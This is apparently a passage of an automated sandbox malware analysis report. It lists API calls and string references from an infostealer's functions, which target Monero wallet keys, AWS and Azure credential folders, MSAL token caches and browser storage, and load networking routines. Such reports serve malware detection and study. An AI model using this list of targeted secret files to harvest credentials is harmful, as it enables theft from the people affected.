                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: 14667de3c16a50005ad5ec08e756b5cd81f55b06b9434fbe4dc671002eac1ec2
                                • Instruction ID: d95501d52d4d645b729185e7b66e8194598135b93ce6fb7e4f0e7915674e78d9
                                • Opcode Fuzzy Hash: 14667de3c16a50005ad5ec08e756b5cd81f55b06b9434fbe4dc671002eac1ec2
                                • Instruction Fuzzy Hash: CFE18170A1021A9BCB21EF65DEA5A9F77B9EF20304F04916BF905A7311DB7CDD018B98
                                Function 004E6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6445
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004E64AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E64E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6537
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: e5577a3295d3ad4cfa0acc883bbea48b5a729ad8870921098c4d6d78644d560e
                                • Instruction ID: ce8d8a12671c42f14b71fed00490002a8af90ce68c1ac4bd2d25c61c1bef5c51
                                • Opcode Fuzzy Hash: e5577a3295d3ad4cfa0acc883bbea48b5a729ad8870921098c4d6d78644d560e
                                • Instruction Fuzzy Hash: F0F1EF70A0025A9BCB21AF76D959AAF77B4AF20345F05816BF845D73A1DB3CDC01CB98
                                Function 004E4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E43A3
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E43D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E43FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E4409
                                • lstrlen.KERNEL32(\storage\default\), ref: 004E4414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 004E443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E4471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4498
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E44D7
                                • lstrcat.KERNEL32(00000000,?), ref: 004E44DF
                                • lstrlen.KERNEL32(00501794), ref: 004E44EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4507
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E4513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 004E451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 004E4547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E45A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004E45A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4601
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4653
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E467B
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E46AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 44e78e9e21a6bcb85152c80b88be93d5b5521673388cff16041c277759e5bace
                                • Instruction ID: 467d334d8604b9370a5018d74d3dbf2541c0ca295469a88b48bacae63fe1aeef
                                • Opcode Fuzzy Hash: 44e78e9e21a6bcb85152c80b88be93d5b5521673388cff16041c277759e5bace
                                • Instruction Fuzzy Hash: 5BB1DE70B1025A9BCB21EF76DA59AAF77A8AF50305F00512BF942D7352DB7CDC018B98
                                Function 004E57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E57D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004E5804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E5868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E58C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E58D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E58F8
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E5961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5988
                                • lstrlen.KERNEL32(00501794), ref: 004E599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E59B9
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E59C5
                                • lstrlen.KERNEL32(00CFE028), ref: 004E59D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E59F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E5A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004E5A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E5AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E5B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E5B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E5B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5BB5
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E5BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E5C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5C70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 86e2e83a1c871166aa5f72d4bf32516da25772042020f6eff5bdf3b4e87208b3
                                • Instruction ID: 5c63266623cbcec0dc571b5c3af7f3008f758138c99f9d11533eeb09424e767d
                                • Opcode Fuzzy Hash: 86e2e83a1c871166aa5f72d4bf32516da25772042020f6eff5bdf3b4e87208b3
                                • Instruction Fuzzy Hash: 2302E170A0065ADFCB21EF6AC999AAF77B5AF14309F04812AF80593351CB7CDC41CB98
                                Function 004D1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004D1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D1135
                                  • Part of subcall function 004D1120: RtlAllocateHeap.NTDLL(00000000), ref: 004D113C
                                  • Part of subcall function 004D1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004D1159
                                  • Part of subcall function 004D1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004D1173
                                  • Part of subcall function 004D1120: RegCloseKey.ADVAPI32(?), ref: 004D117D
                                • lstrcat.KERNEL32(?,00000000), ref: 004D11C0
                                • lstrlen.KERNEL32(?), ref: 004D11CD
                                • lstrcat.KERNEL32(?,.keys), ref: 004D11E8
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D121F
                                • lstrlen.KERNEL32(00CF9330), ref: 004D122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1251
                                • lstrcat.KERNEL32(00000000,00CF9330), ref: 004D1259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 004D1264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 004D1294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D12BA
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D12FF
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004D130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1335
                                • lstrcat.KERNEL32(00000000,?), ref: 004D133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1378
                                • lstrcat.KERNEL32(00000000), ref: 004D1385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D13AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 004D13D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1401
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D143D
                                  • Part of subcall function 004EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 004EEE12
                                • DeleteFileA.KERNEL32(?), ref: 004D1471
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: e3cc38350e0a5ea44e2748eaa2ed889ab6eccf9e111d51634d8cf3e4cfb88fdb
                                • Instruction ID: a99e89f62a2f0429f14f5d75f640bff4bab1dfe077275fff217903339b1499bf
                                • Opcode Fuzzy Hash: e3cc38350e0a5ea44e2748eaa2ed889ab6eccf9e111d51634d8cf3e4cfb88fdb
                                • Instruction Fuzzy Hash: 49A1A171B0021AABDB21EBB5DD99A9F77B8AF14304F00416BF905E7361DB78DD018B98
                                Function 004EE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004EE740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004EE769
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE79F
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 004EE7C6
                                • memset.MSVCRT ref: 004EE805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004EE82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE85F
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 004EE886
                                • memset.MSVCRT ref: 004EE8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004EE8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE920
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004EE947
                                • memset.MSVCRT ref: 004EE986
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: 896df3bd47669fc424bd3e046f88737685751dc8418d1676e12265fe35573749
                                • Instruction ID: a0e8700a9e0b512d685e16441bbb85d731ecc73dfb4451dea8f30449ea8a073f
                                • Opcode Fuzzy Hash: 896df3bd47669fc424bd3e046f88737685751dc8418d1676e12265fe35573749
                                • Instruction Fuzzy Hash: 4F711971A40229ABDB21EB61DC46FED7774EF48300F00449AF7199B2C1DEB89A448B5C
                                Function 004EABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32 ref: 004EABCF
                                • lstrlen.KERNEL32(00CFF5D0), ref: 004EABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004EAC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004EAC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EACB7
                                • lstrlen.KERNEL32(00504AD4), ref: 004EACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EACF3
                                • lstrcat.KERNEL32(00000000,00504AD4), ref: 004EACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAD28
                                • lstrlen.KERNEL32(00504AD4), ref: 004EAD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAD5C
                                • lstrcat.KERNEL32(00000000,00504AD4), ref: 004EAD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAD91
                                • lstrlen.KERNEL32(00CFF600), ref: 004EADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004EADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EAE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004EAE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAE6F
                                • lstrlen.KERNEL32(00000000), ref: 004EAE85
                                • lstrcpy.KERNEL32(00000000,00CFF3F0), ref: 004EAEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: fada8abe07c8ee281e3be51e881a9a398c8e5d5d49df871dc6b11925b9e09670
                                • Instruction ID: 5ed64551d427574451efda867aa0a3efc5810fd232c1c912e9357a8c61190d0f
                                • Opcode Fuzzy Hash: fada8abe07c8ee281e3be51e881a9a398c8e5d5d49df871dc6b11925b9e09670
                                • Instruction Fuzzy Hash: 84B17F70A105169BCB21EB6ACD58AAF77B5EF10305F04452BF40197361DB7CED11CB99
                                Function 004F47E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,004E72A4), ref: 004F47E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 004F47FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 004F480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004F481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 004F482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 004F4840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 004F4851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 004F4862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 004F4873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 004F4884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 004F4895
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
